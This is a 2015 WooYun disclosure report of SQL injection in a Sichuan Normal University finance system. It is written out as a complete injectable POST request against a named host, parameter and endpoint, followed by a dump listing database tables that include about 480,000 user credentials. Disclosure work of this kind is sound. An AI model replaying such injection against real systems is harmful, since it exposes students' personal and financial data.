当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147516

漏洞标题:四川师范大学某处注入导致全库信息泄露

相关厂商:sicnu.edu.cn

漏洞作者: 云袭2001

提交时间:2015-10-19 11:32

修复时间:2015-12-05 14:44

公开时间:2015-12-05 14:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-19: 细节已通知厂商并且等待厂商处理中
2015-10-21: 厂商已经确认,细节仅向厂商公开
2015-10-31: 细节向核心白帽子及相关领域专家公开
2015-11-10: 细节向普通白帽子公开
2015-11-20: 细节向实习白帽子公开
2015-12-05: 细节向公众公开

简要描述:

rt

详细说明:

好吧 这次是计财处
一个注入点 导致全库信息泄露 计财处的数据库。。。咳咳。。东西确实多

漏洞证明:

POST的注入

POST /pages/User/findPass.do HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://202.115.200.140:8082/pages/User/findPass.do
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 202.115.200.140:8082
Content-Length: 26
Pragma: no-cache
Cookie: JSESSIONID=C251CAB5EB301A27961B08521B281697
id=&step=1&name=2014110306


name 存在注入

1.png


DBA权限:

2.png


21库:

3.png


看看其中的一个
STUDENT 库:141张表

Database: STUDENT
[141 tables]
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| ZT_CJ_INFO_CHANGE | 11105462|
| S_UPDATELOG | 4365071 |
| SF_QFDB | 1826115 |
| SF_YSK | 1826115 |
| SF_SFDMX | 1618157 |
| SF_ZZ | 713811 |
| SF_SFDB | 543828 |
| ZWXMJE | 509639 |
| USER_ROLE | 486181 |
| S_USER | 486065 | 这里是账号和密码 48w条
| JZJ_FFSJ | 402865 |
| ZWPZB | 274624 |
| SF_XSQF | 252711 |
| PXSJZ | 244328 |
| JZJ_ZCXX | 209501 |
| PXSDM | 208953 |
| DG_JCKJS | 110653 |
| ZWNEW_ZWXMZD | 90834 |
| SF_SFDMX_BAK | 79660 |
| ZWXMZD | 62732 |
| ONLINE_USER | 61196 |
| JZJ_ZCXX_EDIT | 57781 |
| ZT_CJ_INFO | 52200 |
| SF_TFDMX | 48180 |
| SF_TFDB | 42495 |
| TB_JWXT | 35472 |
| TB_CJXT | 35421 |
| TB_YJSXT | 35421 |
| CJ_FP_FY_YFP | 30172 |
| S_USER_INFO | 26738 |
| JZJ_ZCXX_UPDATE | 26505 |
| CJ_FP_DK | 24991 |
| TEMP_XJXH | 9670 |
| JZJ_CHECK_HIS | 7726 |
| DG_JCK | 7701 |
| ZC_RESULT_BAK | 7341 |
| PBJDM | 5983 |
| ZWKMZD | 5490 |
| ZC_RESULT_BAK_20131001 | 4978 |
| PZGDM | 4530 |
| SF_JMDMX | 3665 |
| SF_JMDB | 3611 |
| SUGGEST | 2767 |
| GUEST | 2266 |
| PZGQX | 1364 |
| CW_JZJ_BAK | 1204 |
| PZYDM_NEW | 1093 |
| ZC_RESULT | 1043 |
| TB_YXXT | 958 |
| CJ_ZY_SFXM | 942 |
| ZWBMZD | 832 |
| ROLE_RESOURCE | 618 |
| ZWPZBH | 582 |
| ZWNEW_ZWKMZD | 578 |
| CJ_FPBL | 551 |
| JZJ_BASE | 541 |
| ZC_RESULT20131105 | 487 |
| ZC_RESULT_2013004 | 487 |
| ZT_CJ_ZY_CHANGE | 415 |
| CJ_FP_MX | 331 |
| NEWSINFO | 260 |
| S_RESOURCE | 196 |
| ZWNEW_ZWXMLX | 194 |
| CJ_YSKDM | 175 |
| MYTEMP | 157 |
| ZWNEW_ZWBMZD | 110 |
| PBMDM | 101 |
| ZGBM | 76 |
| PSFXM | 68 |
| CW_ZXDK_GJ_BAK | 60 |
| ZWNEW_ZWXMLB | 41 |
| CJ_BXXS | 36 |
| JZJ_FFSJ_BAK | 34 |
| PSFQJ | 33 |
| CJ_BJDM | 31 |
| CW_FZZ | 24 |
| S_ROLE | 24 |
| PXSXZ | 21 |
| CJ_FZBMDM | 18 |
| DBCONFIG | 16 |
| NEWSTYPE | 16 |
| PXSLY | 14 |
| DM_BASE_STATUS | 13 |
| JZJ_XMLX | 11 |
| BMLINK | 10 |
| QRTZ_CRON_TRIGGERS | 10 |
| QRTZ_JOB_DETAILS | 10 |
| QRTZ_TRIGGERS | 10 |
| TB_PZGDM | 10 |
| SMS_OTHER_SEND | 9 |
| PPYCC | 8 |
| PXSZT | 8 |
| CW_ZXDK_GJ | 7 |
| DM_FFDXLX | 7 |
| USER_TYPE | 7 |
| JZJ_BASE_BAK | 6 |
| WEBARGS | 6 |
| CW_INIT | 5 |
| DM_ZJXZ | 5 |
| QRTZ_LOCKS | 5 |
| ZC_ID | 5 |
| ZXDK_GJ_BAK | 5 |
| CJ_JD_XS | 4 |
| CJ_LX | 4 |
| DM_FFSJ_ISSH | 4 |
| PYHDM | 4 |
| CJ_BXMS | 3 |
| CW_ZXDK_SYD | 3 |
| JZJ_FFFS | 3 |
| P_MEMO | 3 |
| TB_JZJ_FFSJ | 3 |
| ZXDK_GJ | 3 |
| ZXDK_SYD | 3 |
| SMS_OTHER_SEND_BAK | 2 |
| ZC_FILE | 2 |
| ZXDK_SYD_BAK | 2 |
| CJ_FP_DM_SFND | 1 |
| CJ_FPBL_MEMO | 1 |
| SMS_CONFIG | 1 |
+------------------------+---------+


库里面的其他信息我就不点明了

修复方案:

这次影响算严重吧

版权声明:转载请注明来源 云袭2001@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-21 14:42

厂商回复:

感谢支持!

最新状态:

暂无